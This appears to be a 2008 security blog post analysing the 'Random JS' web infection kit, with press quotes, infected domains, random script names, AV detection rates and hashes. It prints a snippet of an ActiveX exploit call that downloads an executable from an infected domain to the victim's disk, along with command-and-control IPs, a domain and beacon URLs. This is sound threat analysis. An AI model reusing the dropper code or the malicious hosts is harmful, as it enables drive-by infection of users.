The Random JS infection kit as originally named by Finjan, is perhaps the first publicly announced malicious innovation for 2008, in fact I've managed to obtain a copy of a sample .js and witness the filename change on the next request combined with complete disappearance of any .js on the third visit. Here's some press coverage - "Over 10,000 trusted websites infected by new Trojan toolkit" :"The random js attack is performed by dynamic embedding of scripts into a webpage. It provides a random filename that can only be accessed once. This dynamic embedding is done in such a selective manner that when a user has received a page with the embedded malicious script once, it will not be referenced again on further requests. This method prevents detection of the malware in later forensic analyses."
And several more articles - "Hacking Toolkit Compromises Thousands Of Web Servers" ; "Trojan toolkit infected 10000 Web sites in December" ; "Legitimate sites serving up stealthy attacks". Compared to all of the malware embedded attacks during 2007 which were serving the malware from a secondary domain, as well as the exploits themselves, in attack technique is hosting everything on the infected domain. Sample random and local malware locations :
bunburyymas.com/ihkxtmzl
bunburyymas.com/odjiffkl
techicorner.com/bcuoixqf
otcash.com/ktehxwmj
otcash.com/soqutkue
otcash.com/bemkwijz
Sample .js random filenames :
cgolu.js; czynd.js; eenom.js; eqfps.js; erztp.js; frpmg.js; iggmy.js; jiodm.js; khkev.js; kksyr.js; kobgw.js; kolqj.js; lvmlt.js; nrvaj.js; oalhi.js; pcqab.js; tezam.js; tfxep.js; unolc.js; vduoz.js;
Sample malware hosting URL snippet :
bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(OBJECT id=yah8 classid=clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F> try { yah8.GetFile( bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(
Copies of the malware obtained mosvs8.exe -- and logically submitted to each and every anti virus vendor on behalf of VirusTotal just like every sample I ever came across to in the incident responses -- attempt to connect to 206.53.51.75, 206.53.56.30, and back39409404.com, making naughty web requests such as :
206.53.51.75/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e
&uptime=00:00:58:38
back39409404.com/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e
&uptime=00:00:58:35
The following files are partly accessible at the still active C&C's, the first one for instance :cgi-bin/forms.cgi
cgi-bin/cert.cgi
cgi-bin/options.cgi
cgi-bin/ss.cgi
cgi-bin/pstore.cgi
cgi-bin/cmd.cgi
cgi-bin/file.cgi
Did anti virus vendors come up with a detection pattern for the .js already? Partly.
Detection rate : Result: 11/32 (34.38%) JS.IEslice.aq; JS/SillyDlScript.DG; Exploit:JS/Mult.K
File size: 31679 bytes
MD5: 93152dc2392349d828526157bf601677
SHA1: 1b10790d16c9c0d87132d40503b37f82b7f03560
And now that we've witnessed the execution of such an advanced and random attack approach limiting the possibilities for assessing the impact of a malware embedded attack the way it was done so far, we can only speculate on what's to come by the end of the first quarter of 2008. From my perspective however, the smartest thing in this type of attack technique is that they limit the leads they leave behind to the minimum, thus, forwarding the responsibility to the infected host and limiting the possibility for easy expanding of the rest of their ecosystem. Moreover, despite that the module or the actual kit if it's really a kit is a Proprietary Malware Tool for the time being, it will sooner or later leak out, and turn into a commodity, just like MPack and IcePack are these days.
